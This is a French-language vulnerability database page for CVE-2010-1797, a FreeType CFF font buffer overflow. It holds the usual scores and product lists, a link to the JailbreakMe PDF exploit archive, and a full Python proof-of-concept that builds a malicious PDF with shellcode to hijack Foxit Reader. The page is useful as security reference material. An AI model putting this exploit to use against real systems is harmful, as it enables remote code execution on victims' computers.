CVE-2010-1797 Détail

CVE-2010-1797

Catégories

Overflow

EPSS

46.42%V3

Vecteur

Network

Publié

2010-08-16
16h25 +00:00

Modifié

2017-08-16
12h57 +00:00

Liens officiels

CVE.org

NVD

Notifications pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Gestion des notifications

Liste des Notifications

Notifications pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.

Critères appliqués l'envoi de l'alerte : par rapport à la dernière alerte envoyée + différences au niveau de CISA, EPSS, CVSS, CWE, Solutions, CPE.

Paramètres

Vous pouvez spécifier un titre qui sera récupéré dans les alertes qui seront envoyées.

Spécifiez ici un CVE ID comme CVE-2025-1234

Planifications

Mois

Prochaine exécution calculée

Jour

Jour de la semaine

Heure

Minute

Date de création

Dernière exécution

Prochaine exécution

Fonctionnalité nécessitant une connexion

Cette fonctionnalité qui vous permet de recevoir des alertes, n'est active que lorsque vous êtes connecté à votre compte.

Descriptions du CVE

Multiple stack-based buffer overflows in the cff_decoder_parse_charstrings function in the CFF Type2 CharStrings interpreter in cff/cffgload.c in FreeType before 2.4.2, as used in Apple iOS before 4.0.2 on the iPhone and iPod touch and before 3.2.2 on the iPad, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted CFF opcodes in embedded fonts in a PDF document, as demonstrated by JailbreakMe. NOTE: some of these details are obtained from third party information.

Informations du CVE

Faiblesses connexes

CWE-ID	Nom de la faiblesse	Source
CWE-119	Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques	Score	Gravité	CVSS Vecteur	Source
V2	9.3		AV:N/AC:M/Au:N/C:C/I:C/A:C	[email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 14538

Date de publication : 2010-08-02 22h00 +00:00
Auteur : jailbreakme
EDB Vérifié : Yes

The files contained in the archive link below are those that make use of a pdf exploit in order to jailbreak devices running Apple iOS. These pdf's are of interest in that they originate in userland and give root access to the devices. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14538.7z (ios_pdf_exploit.7z)

Exploit Database EDB-ID : 14727

Date de publication : 2010-08-23 22h00 +00:00
Auteur : Jose Miguel Esparza
EDB Vérifié : No

import sys,zlib def getFFShellcode(sc): ff_sc = '' if len(sc)%4 != 0: sc += (4-len(sc)%4)*'\x00' for i in range(0,len(sc),4): ff_sc += '\xff'+sc[i+3]+sc[i+2]+sc[i+1]+sc[i] return ff_sc outputHeader = ''' ############################################################################################## # FreeType Compact Font Format (CFF) Multiple Stack Based Buffer Overflow (CVE-2010-1797) # ############################################################################################## # # # Product: Foxit Reader <= 4.0 # # Platforms: Windows XP, Windows Vista # # Author: Jose Miguel Esparza <jesparza AT eternal-todo DOT com> # # Web: http://eternal-todo.com # # Date: 2010-08-23 # # # ############################################################################################## ''' outputFileName = 'foxit_type2_poc.pdf' usage = 'Usage: '+sys.argv[0]+' target\n\nTargets:\n\t0 - Foxit Reader > 3.0\n\t1 - Foxit Reader 3.0\n\t2 - Other versions' COMEX_PDF_TEMPLATE = '''%PDF-1.3 %\xbe\xbe\xba\xba 4 0 obj << /Length 631 >> stream q Q q 18 750 576 24 re W n /Cs1 cs 0 0 0 sc q 1 0 0 -1 0 0 cm BT 0.0003 Tc 7 0 0 -7 534.7051 -768 Tm /F2.0 1 Tf [ (4/15/10 8:01 P) 1 (M) ] TJ ET Q q 1 0 0 -1 0 0 cm BT 7 0 0 -7 18 -768 Tm /F2.0 1 Tf [ (d) -0.4 (a) -0.2 (ta) -0.2 (:) -0.4 (te) -0.1 (x) -0.3 (t/) -0.4 (h) 0.4 (tm) 0.4 (l) -0.1 (,) -0.4 ( ) ] TJ ET Q Q q 18 40 576 24 re W n /Cs1 cs 0 0 0 sc q 1 0 0 -1 0 0 cm BT -0.0003 Tc 7 0 0 -7 555.6299 -43 Tm /F2.0 1 Tf [ (Pa) -1 (ge ) -1 (1) -1 ( ) -1 (o) -1 (f ) -1 (1) ] TJ ET Q Q q 18 190 576 560 re W n /Cs1 cs 1 1 1 sc 18 190 576 560 re f 0 0 0 sc q 0.8 0 0 -0.8 18 750 cm BT 16 0 0 -16 8 22 Tm /F2.0 1 Tf ( ) Tj ET Q Q endstream endobj 2 0 obj << /Type /Page /Parent 3 0 R /Resources 5 0 R /Contents 4 0 R /MediaBox [0 0 612 792] >> endobj 5 0 obj << /ProcSet [ /PDF /Text ] /ColorSpace << /Cs1 6 0 R >> /Font << /F2.0 8 0 R >> >> endobj 3 0 obj << /Type /Pages /MediaBox [0 0 612 792] /Count 1 /Kids [ 2 0 R ] >> endobj 7 0 obj << /Type /Catalog /Pages 3 0 R >> endobj 11 0 obj << /Subtype/Type1C /Filter[/FlateDecode] /Length $CFF_STREAM_LENGTH >> stream $CFF_STREAM endstream endobj 9 0 obj << /Type /FontDescriptor /Ascent 750 /CapHeight 676 /Descent -250 /Flags 32 /FontBBox [-203 -428 1700 1272] /FontName /CSDIZD+Times-Roman /ItalicAngle 0 /StemV 0 /MaxWidth 1721 /XHeight 461 /FontFile3 11 0 R >> endobj 10 0 obj [ 556 ] endobj 8 0 obj << /Type /Font /Subtype /Type1 /BaseFont /CSDIZD+Times-Roman /FontDescriptor 9 0 R /Widths 10 0 R /FirstChar 32 /LastChar 32 /Encoding /MacRomanEncoding >> endobj 1 0 obj << >> endobj xref 0 12 0000000000 65535 f 0000017767 00000 n 0000000408 00000 n 0000003397 00000 n 0000000022 00000 n 0000000389 00000 n 0000000512 00000 n 0000003361 00000 n 0000017359 00000 n 0000007240 00000 n 0000000622 00000 n 0000003340 00000 n trailer << /Size 12 /Root 7 0 R /Info 1 0 R >> startxref 17942 %%EOF ''' MAX_FF_SECTION_LEN = 45*5 JUMP_BYTE = ['\xcd','\xcc'] POP_POP_RET_ADDRESS = ['\x00\x40\x11\x85','\x00\x40\xce\x36'] # Foxit reader addresses, depending on the version NUM_SECOND_INSTRUCTIONS_SET = [183,182] # calc.exe shellcode shellcode = '\x68\x10\xf5\x00\x00\x31\xf6\x64\x8b\x76\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x6e\x08\x8b\x36\x8b\x5d\x3c\x8b\x5c\x1d\x78\x01\xeb\x8b\x4b\x18\x67\xe3\xec\x8b\x7b\x20\x01\xef\x8b\x7c\x8f\xfc\x01\xef\x31\xc0\x99\x32\x17\x66\xc1\xca\x01\xae\x75\xf7\x58\x66\x3b\xd0\x50\xe0\xe2\x75\xcc\x8b\x53\x24\x01\xea\x0f\xb7\x14\x4a\x8b\x7b\x1c\x01\xef\x03\x2c\x97\x66\x3d\x10\xf5\x75\x0e\x33\xc0\x50\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x54\xff\xd5\x68\x06\xcb\x00\x00\xeb\x92' cff_header = '\x01\x00\x04\x01\x00\x01\x01\x01\x13ABCDEF+Times-Roman\x00\x01\x01\x01\x1f\xf8\x1b\x00\xf8\x1c\x02\xf8\x1d\x03\xf8\x19\x04\x1co\x00\r\xfb<\xfbn\xfa|\xfa\x16\x05\xe9\x11\x8b\x8b\x12\x00\x03\x01\x01\x08\x13\x18001.007Times RomanTimes\x00\x00\x00\x02\x04\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x04\xdc' if len(sys.argv) > 2 or (len(sys.argv) == 2 and not sys.argv[1].isdigit()) or len(sys.argv) == 1: sys.exit(usage) version = int(sys.argv[1]) if version == 2: sys.exit('Versions < 3.0 are not implemented, try it!! ;)\n') if version > 2: sys.exit(usage) print outputHeader print '[-] Creating PDF file...' # Building the FF section ff_shellcode = getFFShellcode(shellcode) ff_zero_bytes = '\xff\x00\x00\x00\x00' ff_instructions = ff_zero_bytes*11 + ff_shellcode + ((MAX_FF_SECTION_LEN - len(ff_shellcode) - 55 - 5*5)/5) * ff_zero_bytes + '\xff\x90\x90\x8a\xeb' + '\xff'+POP_POP_RET_ADDRESS[version] + ('\xff\x00'+JUMP_BYTE[version]+'\x00\x00')*3 if len(ff_instructions) > MAX_FF_SECTION_LEN: sys.exit('[x] FF section bigger than expected!!') # Operators sections first_instructions_set = '\x0c\x17\x0c\x17\x0c\x04\x0c\x1d' * 20 second_instructions_set = '\x0c\x17\x0c\x1d' * NUM_SECOND_INSTRUCTIONS_SET[version] third_instructions_set = '\x0c\x1d\x0c\x12' * 42 # Building the full CFF content for the fake charstring cff_content = cff_header + '\x0e'*4 + ff_instructions + first_instructions_set + second_instructions_set + third_instructions_set + ff_zero_bytes + '\x0e' # Decoding with FlateDecode encoded_cff_content = zlib.compress(cff_content) # Creating the PDF based on the Comex PDF, slightly modified pdf_content = COMEX_PDF_TEMPLATE pdf_content = pdf_content.replace('$CFF_STREAM_LENGTH',str(len(encoded_cff_content))) pdf_content = pdf_content.replace('$CFF_STREAM',encoded_cff_content) open(outputFileName,'w').write(pdf_content) print '[+] File "'+outputFileName+'" created, test it!!'

Products Mentioned

Configuraton 0

Apple>>Iphone_os >> Version 1.0.0

Apple>>Iphone_os >> Version 1.0.0 (Open CPE detail)
Apple>>Iphone_os >> Version 1.0.0 (Open CPE detail)

Apple>>Iphone_os >> Version 1.0.1

Apple>>Iphone_os >> Version 1.0.1 (Open CPE detail)
Apple>>Iphone_os >> Version 1.0.1 (Open CPE detail)

Apple>>Iphone_os >> Version 1.0.1

Apple>>Iphone_os >> Version 1.0.1 (Open CPE detail)

Apple>>Iphone_os >> Version 1.0.2

Apple>>Iphone_os >> Version 1.0.2 (Open CPE detail)
Apple>>Iphone_os >> Version 1.0.2 (Open CPE detail)

Apple>>Iphone_os >> Version 1.0.2

Apple>>Iphone_os >> Version 1.0.2 (Open CPE detail)

Apple>>Iphone_os >> Version 1.1.0

Apple>>Iphone_os >> Version 1.1.0 (Open CPE detail)
Apple>>Iphone_os >> Version 1.1.0 (Open CPE detail)
Apple>>Iphone_os >> Version 1.1.0 (Open CPE detail)

Apple>>Iphone_os >> Version 1.1.0

Apple>>Iphone_os >> Version 1.1.0 (Open CPE detail)

Apple>>Iphone_os >> Version 1.1.0

Apple>>Iphone_os >> Version 1.1.0 (Open CPE detail)

Apple>>Iphone_os >> Version 1.1.1

Apple>>Iphone_os >> Version 1.1.1 (Open CPE detail)
Apple>>Iphone_os >> Version 1.1.1 (Open CPE detail)
Apple>>Iphone_os >> Version 1.1.1 (Open CPE detail)

Apple>>Iphone_os >> Version 1.1.1

Apple>>Iphone_os >> Version 1.1.1 (Open CPE detail)

Apple>>Iphone_os >> Version 1.1.2

Apple>>Iphone_os >> Version 1.1.2 (Open CPE detail)
Apple>>Iphone_os >> Version 1.1.2 (Open CPE detail)
Apple>>Iphone_os >> Version 1.1.2 (Open CPE detail)

Apple>>Iphone_os >> Version 1.1.2

Apple>>Iphone_os >> Version 1.1.2 (Open CPE detail)

Apple>>Iphone_os >> Version 1.1.2

Apple>>Iphone_os >> Version 1.1.2 (Open CPE detail)

Apple>>Iphone_os >> Version 1.1.3

Apple>>Iphone_os >> Version 1.1.3 (Open CPE detail)
Apple>>Iphone_os >> Version 1.1.3 (Open CPE detail)
Apple>>Iphone_os >> Version 1.1.3 (Open CPE detail)

Apple>>Iphone_os >> Version 1.1.3

Apple>>Iphone_os >> Version 1.1.3 (Open CPE detail)

Apple>>Iphone_os >> Version 1.1.3

Apple>>Iphone_os >> Version 1.1.3 (Open CPE detail)

Apple>>Iphone_os >> Version 1.1.4

Apple>>Iphone_os >> Version 1.1.4 (Open CPE detail)
Apple>>Iphone_os >> Version 1.1.4 (Open CPE detail)
Apple>>Iphone_os >> Version 1.1.4 (Open CPE detail)

Apple>>Iphone_os >> Version 1.1.4

Apple>>Iphone_os >> Version 1.1.4 (Open CPE detail)

Apple>>Iphone_os >> Version 1.1.4

Apple>>Iphone_os >> Version 1.1.4 (Open CPE detail)

Apple>>Iphone_os >> Version 1.1.5

Apple>>Iphone_os >> Version 1.1.5 (Open CPE detail)
Apple>>Iphone_os >> Version 1.1.5 (Open CPE detail)
Apple>>Iphone_os >> Version 1.1.5 (Open CPE detail)

Apple>>Iphone_os >> Version 1.1.5

Apple>>Iphone_os >> Version 1.1.5 (Open CPE detail)

Apple>>Iphone_os >> Version 1.1.5

Apple>>Iphone_os >> Version 1.1.5 (Open CPE detail)

Apple>>Iphone_os >> Version 2.0

Apple>>Iphone_os >> Version 2.0 (Open CPE detail)

Apple>>Iphone_os >> Version 2.0.0

Apple>>Iphone_os >> Version 2.0.0 (Open CPE detail)
Apple>>Iphone_os >> Version 2.0.0 (Open CPE detail)
Apple>>Iphone_os >> Version 2.0.0 (Open CPE detail)

Apple>>Iphone_os >> Version 2.0.0

Apple>>Iphone_os >> Version 2.0.0 (Open CPE detail)

Apple>>Iphone_os >> Version 2.0.0

Apple>>Iphone_os >> Version 2.0.0 (Open CPE detail)

Apple>>Iphone_os >> Version 2.0.1

Apple>>Iphone_os >> Version 2.0.1 (Open CPE detail)
Apple>>Iphone_os >> Version 2.0.1 (Open CPE detail)
Apple>>Iphone_os >> Version 2.0.1 (Open CPE detail)

Apple>>Iphone_os >> Version 2.0.1

Apple>>Iphone_os >> Version 2.0.1 (Open CPE detail)

Apple>>Iphone_os >> Version 2.0.1

Apple>>Iphone_os >> Version 2.0.1 (Open CPE detail)

Apple>>Iphone_os >> Version 2.0.2

Apple>>Iphone_os >> Version 2.0.2 (Open CPE detail)
Apple>>Iphone_os >> Version 2.0.2 (Open CPE detail)
Apple>>Iphone_os >> Version 2.0.2 (Open CPE detail)

Apple>>Iphone_os >> Version 2.0.2

Apple>>Iphone_os >> Version 2.0.2 (Open CPE detail)

Apple>>Iphone_os >> Version 2.0.2

Apple>>Iphone_os >> Version 2.0.2 (Open CPE detail)

Apple>>Iphone_os >> Version 2.1

Apple>>Iphone_os >> Version 2.1 (Open CPE detail)
Apple>>Iphone_os >> Version 2.1 (Open CPE detail)
Apple>>Iphone_os >> Version 2.1 (Open CPE detail)

Apple>>Iphone_os >> Version 2.1

Apple>>Iphone_os >> Version 2.1 (Open CPE detail)

Apple>>Iphone_os >> Version 2.1

Apple>>Iphone_os >> Version 2.1 (Open CPE detail)

Apple>>Iphone_os >> Version 2.1.1

Apple>>Iphone_os >> Version 2.1.1 (Open CPE detail)

Apple>>Iphone_os >> Version 2.2

Apple>>Iphone_os >> Version 2.2 (Open CPE detail)
Apple>>Iphone_os >> Version 2.2 (Open CPE detail)
Apple>>Iphone_os >> Version 2.2 (Open CPE detail)

Apple>>Iphone_os >> Version 2.2

Apple>>Iphone_os >> Version 2.2 (Open CPE detail)

Apple>>Iphone_os >> Version 2.2.1

Apple>>Iphone_os >> Version 2.2.1 (Open CPE detail)
Apple>>Iphone_os >> Version 2.2.1 (Open CPE detail)
Apple>>Iphone_os >> Version 2.2.1 (Open CPE detail)

Apple>>Iphone_os >> Version 2.2.1

Apple>>Iphone_os >> Version 2.2.1 (Open CPE detail)

Apple>>Iphone_os >> Version 2.2.1

Apple>>Iphone_os >> Version 2.2.1 (Open CPE detail)

Apple>>Iphone_os >> Version 3.0

Apple>>Iphone_os >> Version 3.0 (Open CPE detail)
Apple>>Iphone_os >> Version 3.0 (Open CPE detail)
Apple>>Iphone_os >> Version 3.0 (Open CPE detail)

Apple>>Iphone_os >> Version 3.0

Apple>>Iphone_os >> Version 3.0 (Open CPE detail)

Apple>>Iphone_os >> Version 3.0

Apple>>Iphone_os >> Version 3.0 (Open CPE detail)

Apple>>Iphone_os >> Version 3.0.1

Apple>>Iphone_os >> Version 3.0.1 (Open CPE detail)
Apple>>Iphone_os >> Version 3.0.1 (Open CPE detail)
Apple>>Iphone_os >> Version 3.0.1 (Open CPE detail)

Apple>>Iphone_os >> Version 3.0.1

Apple>>Iphone_os >> Version 3.0.1 (Open CPE detail)

Apple>>Iphone_os >> Version 3.1

Apple>>Iphone_os >> Version 3.1 (Open CPE detail)
Apple>>Iphone_os >> Version 3.1 (Open CPE detail)
Apple>>Iphone_os >> Version 3.1 (Open CPE detail)
Apple>>Iphone_os >> Version 3.1 (Open CPE detail)

Apple>>Iphone_os >> Version 3.1

Apple>>Iphone_os >> Version 3.1 (Open CPE detail)

Apple>>Iphone_os >> Version 3.1

Apple>>Iphone_os >> Version 3.1 (Open CPE detail)

Apple>>Iphone_os >> Version 3.1.2

Apple>>Iphone_os >> Version 3.1.2 (Open CPE detail)
Apple>>Iphone_os >> Version 3.1.2 (Open CPE detail)
Apple>>Iphone_os >> Version 3.1.2 (Open CPE detail)

Apple>>Iphone_os >> Version 3.1.2

Apple>>Iphone_os >> Version 3.1.2 (Open CPE detail)

Apple>>Iphone_os >> Version 3.1.2

Apple>>Iphone_os >> Version 3.1.2 (Open CPE detail)

Apple>>Iphone_os >> Version 3.1.3

Apple>>Iphone_os >> Version 3.1.3 (Open CPE detail)
Apple>>Iphone_os >> Version 3.1.3 (Open CPE detail)
Apple>>Iphone_os >> Version 3.1.3 (Open CPE detail)

Apple>>Iphone_os >> Version 3.1.3

Apple>>Iphone_os >> Version 3.1.3 (Open CPE detail)

Apple>>Iphone_os >> Version 3.2

Apple>>Iphone_os >> Version 3.2 (Open CPE detail)
Apple>>Iphone_os >> Version 3.2 (Open CPE detail)
Apple>>Iphone_os >> Version 3.2 (Open CPE detail)

Apple>>Iphone_os >> Version 3.2

Apple>>Iphone_os >> Version 3.2 (Open CPE detail)

Apple>>Iphone_os >> Version 3.2

Apple>>Iphone_os >> Version 3.2 (Open CPE detail)

Apple>>Iphone_os >> Version 3.2.1

Apple>>Iphone_os >> Version 3.2.1 (Open CPE detail)
Apple>>Iphone_os >> Version 3.2.1 (Open CPE detail)

Apple>>Iphone_os >> Version 3.2.1

Apple>>Iphone_os >> Version 3.2.1 (Open CPE detail)

Apple>>Iphone_os >> Version 4.0

Apple>>Iphone_os >> Version 4.0 (Open CPE detail)
Apple>>Iphone_os >> Version 4.0 (Open CPE detail)
Apple>>Iphone_os >> Version 4.0 (Open CPE detail)

Apple>>Iphone_os >> Version 4.0

Apple>>Iphone_os >> Version 4.0 (Open CPE detail)

Apple>>Iphone_os >> Version 4.0

Apple>>Iphone_os >> Version 4.0 (Open CPE detail)

Apple>>Iphone_os >> Version 4.0.1

Apple>>Iphone_os >> Version 4.0.1 (Open CPE detail)
Apple>>Iphone_os >> Version 4.0.1 (Open CPE detail)
Apple>>Iphone_os >> Version 4.0.1 (Open CPE detail)

Apple>>Iphone_os >> Version 4.0.1

Apple>>Iphone_os >> Version 4.0.1 (Open CPE detail)

Apple>>Iphone_os >> Version 4.0.1

Apple>>Iphone_os >> Version 4.0.1 (Open CPE detail)

Références

http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=018f5c27813dd7eef4648fe254632ecea0c85a50
Tags : x_refsource_CONFIRM

https://bugzilla.redhat.com/show_bug.cgi?id=621144
Tags : x_refsource_CONFIRM

http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=11d65e8a1f1f14e56148fd991965424d9bd1cdbc
Tags : x_refsource_CONFIRM

http://www.exploit-db.com/exploits/14538
Tags : exploit, x_refsource_EXPLOIT-DB

https://bugs.launchpad.net/ubuntu/maverick/+source/freetype/+bug/617019
Tags : x_refsource_CONFIRM

http://www.vupen.com/english/advisories/2010/2018
Tags : vdb-entry, x_refsource_VUPEN

http://osvdb.org/66828
Tags : vdb-entry, x_refsource_OSVDB

http://www.f-secure.com/weblog/archives/00002002.html
Tags : x_refsource_MISC

http://www.ubuntu.com/usn/USN-972-1
Tags : vendor-advisory, x_refsource_UBUNTU

http://lists.apple.com/archives/security-announce/2010//Aug/msg00001.html
Tags : vendor-advisory, x_refsource_APPLE

http://secunia.com/advisories/40816
Tags : third-party-advisory, x_refsource_SECUNIA

http://support.apple.com/kb/HT4292
Tags : x_refsource_CONFIRM

http://freetype.sourceforge.net/index2.html#release-freetype-2.4.2
Tags : x_refsource_CONFIRM

http://sourceforge.net/projects/freetype/files/freetype2/2.4.2/NEWS/view
Tags : x_refsource_CONFIRM

http://www.securityfocus.com/bid/42151
Tags : vdb-entry, x_refsource_BID

http://support.apple.com/kb/HT4291
Tags : x_refsource_CONFIRM

http://secunia.com/advisories/40982
Tags : third-party-advisory, x_refsource_SECUNIA

http://www.vupen.com/english/advisories/2010/2106
Tags : vdb-entry, x_refsource_VUPEN

http://lists.apple.com/archives/security-announce/2010//Aug/msg00000.html
Tags : vendor-advisory, x_refsource_APPLE

http://secunia.com/advisories/48951
Tags : third-party-advisory, x_refsource_SECUNIA

https://exchange.xforce.ibmcloud.com/vulnerabilities/60856
Tags : vdb-entry, x_refsource_XF

http://secunia.com/advisories/40807
Tags : third-party-advisory, x_refsource_SECUNIA

CVE-2010-1797 : Détail

CVE-2010-1797

Descriptions du CVE

Informations du CVE

Faiblesses connexes

Métriques

EPSS

Score EPSS

Percentile EPSS

Informations sur l'Exploit

Exploit Database EDB-ID : 14538

Exploit Database EDB-ID : 14727

Products Mentioned

Configuraton 0

Références